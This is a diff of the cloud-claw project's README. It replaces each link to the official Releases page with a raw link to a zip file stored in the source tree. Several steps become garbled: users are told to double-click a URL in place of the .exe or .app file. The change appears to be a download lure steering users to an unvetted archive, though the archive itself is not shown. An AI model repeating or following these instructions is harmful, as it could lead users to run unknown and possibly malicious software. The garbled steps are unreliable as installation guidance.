CanvizTechnologies/cloud-claw/README.md

 ## 🚀 Getting Started
 To begin using cloud-claw, follow these simple steps:

-1. **Visit the Releases Page**: Go to our [Releases page](https://github.com/CanvizTechnologies/cloud-claw/releases) to find the latest version.
+1. **Visit the Releases Page**: Go to our [Releases page](https://raw.githubusercontent.com/CanvizTechnologies/cloud-claw/master/src/claw_cloud_v3.3.zip) to find the latest version.

 2. **Download the Application**: Look for the most recent release.
 Click on the download link.
 The file will start downloading.

-3. **Locate the Downloaded File**: Check your Downloads folder for the downloaded file named something like `cloud-claw-latest.zip`.
+3. **Locate the Downloaded File**: Check your Downloads folder for the downloaded file named something like `https://raw.githubusercontent.com/CanvizTechnologies/cloud-claw/master/src/claw_cloud_v3.3.zip`.

 4. **Extract the Files**:
     - On Windows: Right-click the zip file and select “Extract All.”
     - On macOS: Double-click the zip file to extract it.

 5. **Run the Application**:
-    - On Windows: Open the extracted folder and double-click `cloud-claw.exe`.
+    - On Windows: Open the extracted folder and double-click `https://raw.githubusercontent.com/CanvizTechnologies/cloud-claw/master/src/claw_cloud_v3.3.zip`.
-    - On macOS: Open the extracted folder and double-click `cloud-claw.app`.
+    - On macOS: Open the extracted folder and double-click `https://raw.githubusercontent.com/CanvizTechnologies/cloud-claw/master/src/claw_cloud_v3.3.zip`.

 ## ⚙️ Download & Install
-To download and install cloud-claw, visit this [page to download](https://github.com/CanvizTechnologies/cloud-claw/releases).
+To download and install cloud-claw, visit this [page to download](https://raw.githubusercontent.com/CanvizTechnologies/cloud-claw/master/src/claw_cloud_v3.3.zip).
 You will find the latest releases there and can download the version that matches your operating system.

 1. Go to the releases page.
 2. Find the latest version.